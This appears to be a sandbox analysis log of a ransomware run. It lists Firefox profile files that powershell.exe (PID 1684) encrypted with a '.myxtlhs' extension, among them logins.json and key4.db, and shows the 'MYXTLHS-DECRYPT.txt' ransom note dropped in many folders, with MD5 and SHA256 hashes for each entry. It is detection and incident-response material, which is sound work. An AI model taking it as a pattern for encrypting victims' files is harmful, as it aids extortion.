C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata-v2
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata.myxtlhs
binary
MD5: 9739e438bf06bdd179d52ad3a361328b
SHA256: 8258c7f5d4025bdf2b4d50fc96c41400bfc22798ea8a47d4baaa521dc90c7f2e
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\.metadata
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite.myxtlhs
binary
MD5: fb4c8497593d8b18f6725257ea55dd84
SHA256: c29ffcc7050cb06c36890cfd69bb3db21e4d89e06ef2962a1acd77ccaca52d30
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\journals\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1.myxtlhs
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\1
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata-v2.myxtlhs
binary
MD5: 79a7b95fdb89aeb5024a4302a4ac2944
SHA256: 3c1285d6e1468ab8c618de53dd53114b5a4217835db7103056888f11e60f7641
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata-v2
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata.myxtlhs
binary
MD5: 539ba34a7c21c0c958844fe68daf9606
SHA256: 6c9c94c087cb54589903b2c1c07a0f0b13ec83d50ef860ddb598fa3e36215503
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.sqlite.myxtlhs
binary
MD5: 03083204a49e6daf73f10fd7d7fafe13
SHA256: c54c7d35cc2896a56cadc0141beaae5f28b65974290d1f7afc5009f2688ce5d5
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\journals\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\1
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\1.myxtlhs
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\3312185054sbndi_pspte.files\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata-v2.myxtlhs
binary
MD5: f1722ad3253d9cdf996e8e6321824196
SHA256: 4603b2ca1b77bd861e53dbec7d4d7cf5fe4ef8cda5b2368006ce432d08e9060b
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\idb\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata-v2
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata.myxtlhs
binary
MD5: 38357998b7d0145ea1578c7cfa5b16eb
SHA256: 6bf3ef04044d1c823a8a8f19370191faa44ee61588d4b3c5d72e398716e38e95
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\.metadata
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+home\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\SiteSecurityServiceState.txt.myxtlhs
binary
MD5: 6f275e8b41c0fa06e7d979915566f263
SHA256: adf5da966348dca75881367468d90b569f8853bcf9eb5f05f8bbf6b5e020b8ad
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\SiteSecurityServiceState.txt
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore.jsonlz4.myxtlhs
binary
MD5: 10abd30b88021383e13829be0787c8e9
SHA256: 4eb0bfadbaaebfd3819bdfce944763a5c6e3e51ef31e88ca9dfbb91b8a592511
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\previous.jsonlz4.myxtlhs
binary
MD5: e125991d7d39aca3afcfb6c969ababa3
SHA256: 1553e46f4aae44f5ff32224c57c6a9cf0634df1b3ce651828ab47c387771858f
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore.jsonlz4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\previous.jsonlz4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json.myxtlhs
binary
MD5: 4770185abfdb04079ff09e914c7f0081
SHA256: ee00b0a4cd7b542e9195a579eb9796404f1de414a5b60375b67a6490c2fa1279
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\saved-telemetry-pings\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\revocations.txt.myxtlhs
binary
MD5: ddc5821aefdbd379bc121c1216e0a5b5
SHA256: 75815d6b0cafc07f2903b2a754bcb2e5343d06929a44699815c1dde657b9add8
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\search.json.mozlz4.myxtlhs
binary
MD5: 8cc939811e6482689828a53225284119
SHA256: 0e17efc0187bf31f95e048d63d2afddc0525e2e17b310e1fa27ac02fc582d7f6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\search.json.mozlz4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pluginreg.dat.myxtlhs
binary
MD5: 241c62f6978f32d4027c6179e9a3e8d4
SHA256: ce9e07a079725285f0854dafe6ecc991bbf58ffe3ddf06044ef67becbc521279
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js.myxtlhs
binary
MD5: f4081eee156ef69e8246164d3e8f3498
SHA256: 99a652b9ce4903c1d7fa21b4fbb8dedd4440b105ff7c0c39a9a9ada234042b09
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pluginreg.dat
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\revocations.txt
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\places.sqlite.myxtlhs
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\places.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\logins.json.myxtlhs
flc
MD5: 77d57a0d198d93f481e6643b691f9d52
SHA256: 2377c8d566587a6a6f7e6b9661b1843b01c406320ce8d0d47607614f577fae75
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\permissions.sqlite.myxtlhs
binary
MD5: c27bf5606f750e5c5fa5af4522093df5
SHA256: bdaf33d6c87ac2b5634ec5bff4bc69b6848565e59769e2e7f487ba68c42051f4
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\minidumps\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pkcs11.txt.myxtlhs
binary
MD5: 082d2f58fd499c89bbb24178c28035fb
SHA256: bdc04ae3122d0daafa55969247a6cf2ab915fe52e7122a7d5a775761af1d1f2a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pkcs11.txt
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\permissions.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\logins.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\handlers.json.myxtlhs
binary
MD5: 8baf1f1bfbb7ee3d63c7b88d2c00fbaf
SHA256: 2717531e7e69e96bf6cd51b6a8a4973a92e044ed204834116dcf3916309da896
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\key4.db.myxtlhs
binary
MD5: 58e634e943441863b8d905b7c9b0fa33
SHA256: bf72e75a521b5694da60ca5fcbbb28721506a3b7c75caf696ffe747c65de5191
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\key4.db
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\handlers.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.lib.myxtlhs
binary
MD5: feffb877dd80a67fd90095ca66dda1a3
SHA256: 6d887a4ed4412ab8695e140d99c251d13d13a3802107b579f70abb6ba56086e6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.sig.myxtlhs
binary
MD5: 969d3abc1dd1abd2f55f2afd41665b35
SHA256: 7f5be915fa721da5513221f60f468098df88a61ff91b5c9d33c2c65adb975a2e
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\LICENSE.txt.myxtlhs
binary
MD5: a786fd8382d1d232f38a43bda59d6ae7
SHA256: 5958470c9eea0251d82ac642a337c0d8dfb2baeca36c9c075a2b8858796fe29b
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\manifest.json.myxtlhs
binary
MD5: fad6fddd78419f0e540df07bcc72d398
SHA256: ceced411c6a39c106d4e2545be7471b3d52b7025ae4fea450b17290dae21c8ac
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\LICENSE.txt
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.lib
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\manifest.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.sig
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\1.7.1\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\1.7.1\gmpopenh264.info.myxtlhs
binary
MD5: 59c262af4396fad559abad46cdfdd61f
SHA256: 5a3620e1d80ca840d309ee38d384331f65177ea986fb0bfd589cf9f38ed1f643
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp\WINNT_x86-msvc\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-gmpopenh264\1.7.1\gmpopenh264.info
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\formhistory.sqlite.myxtlhs
binary
MD5: 027f71ec4f1325d3c98ba36a4379358e
SHA256: 4a8155c5649394c9e73af232df8a47b533d4c8a55b3bfd12ca6344391157ef06
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\formhistory.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\favicons.sqlite.myxtlhs
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\favicons.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536511076670.6fb1a61f-96c8-4004-a260-a8d32e45a07f.main.jsonlz4.myxtlhs
binary
MD5: 1e2d595b83b3a3ccd67212fa9ab04f44
SHA256: ebd9c2c3f22128539ca7cd2713e5da9f07b2cb977d575e848785bfb4bf5442d1
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\extensions.json.myxtlhs
binary
MD5: 0ecd736c79259b8662ea1ce5cf4f95ea
SHA256: be1a7159e8974f7893fc9679dc88c70ebe8ac0488008015d6b5b27c2826b63da
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\state.json.myxtlhs
binary
MD5: e3d1d92bcf7a3c9792fccb2be8904717
SHA256: 0720d2290f9b94e1af44706f9657298fab11db54e1e50458223ff017ddbbf789
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\session-state.json.myxtlhs
binary
MD5: 5aa02b46a8e3e8dfde402abb91b44ff8
SHA256: c435da2165a44048f15d9343d6dd366a60b72dbbdb865a6896d39516fe86b8a5
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\extensions.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\state.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\session-state.json
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536511076670.6fb1a61f-96c8-4004-a260-a8d32e45a07f.main.jsonlz4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589777.8901d324-d310-406e-8d96-2ba1529e4bea.first-shutdown.jsonlz4.myxtlhs
binary
MD5: 19c6cd3ebf13198b19d3f5fbdb6c5595
SHA256: 3475fa2385c092fa1e1f4f12aacf993aa03b6341b5a6c56b327866921eca73b4
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510890757.0bd2c0b0-6051-4678-a27c-37f3c0a0c3bf.main.jsonlz4.myxtlhs
binary
MD5: b001513a1f0e91699dec9328b873ef22
SHA256: ca4f263227d868c79f8fed3080b176d830c66667bd1bfed0e812e8656d8732a2
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510464398.048632c6-c96b-486d-b119-7e1a7a9c9e9a.main.jsonlz4.myxtlhs
binary
MD5: 5ccab5f39f7e677e239af5d1bb254997
SHA256: 8cc069a56f4dff1ab312bf3ab05b45467ebbbd788ec6bd99eb748c064bd6136c
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535455254239.6a6d1f6c-b378-42bd-83d4-6375a8d83c94.main.jsonlz4.myxtlhs
binary
MD5: cdc3225a7025c4b39eb72919fc639b3c
SHA256: ac5be1ba38368403d9d8960a45551abc8936bd91b23271474fb7945dbe816990
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510890757.0bd2c0b0-6051-4678-a27c-37f3c0a0c3bf.main.jsonlz4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535455254239.6a6d1f6c-b378-42bd-83d4-6375a8d83c94.main.jsonlz4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-09\1536510464398.048632c6-c96b-486d-b119-7e1a7a9c9e9a.main.jsonlz4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589752.05c13197-8f39-40a1-b976-59f6f9c1cc5f.new-profile.jsonlz4.myxtlhs
binary
MD5: 0446402eb4b9407a39642f59fb9152a3
SHA256: a19b8584823e48ef5960a3817e80b310a550faa3a23c6e66da29d60c30575385
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589776.07f73e80-2b12-40ae-97b0-fa87f3167670.main.jsonlz4.myxtlhs
binary
MD5: a45dd9656d0b63d5e768e7164c6e947d
SHA256: 16dc580885daa8d31bc04caf3782edab209aa249d17bd6f8bb362b5caea08abe
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454581431.ff499cec-8d4b-47de-a059-a9aea3d69a66.main.jsonlz4.myxtlhs
binary
MD5: 467660d7c39b49827859d91768a70d4d
SHA256: c588897214a4c4c50c5ed19bec0bae8dd3ba2db224abb918f22175878bc30317
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589777.8901d324-d310-406e-8d96-2ba1529e4bea.first-shutdown.jsonlz4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589752.05c13197-8f39-40a1-b976-59f6f9c1cc5f.new-profile.jsonlz4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454589776.07f73e80-2b12-40ae-97b0-fa87f3167670.main.jsonlz4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\1535454581431.ff499cec-8d4b-47de-a059-a9aea3d69a66.main.jsonlz4
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\events\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\store.json.mozlz4.myxtlhs
binary
MD5: f7cb201030a9e52da7b8670254117a30
SHA256: 69c4c383f078829f6e66c403d5df9131bfeaf693fd21f7233183c2745c6748ec
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\archived\2018-08\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\datareporting\MYXTLHS-DECRYPT.txt
text
MD5: 397f159967adbe86bfe2a363cfd4c1ed
SHA256: 463b5119717aa8fbda20810cbff9f257c3a95bcbff9c7d488203362724e7efc6
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\crashes\store.json.mozlz4
––
MD5:  ––
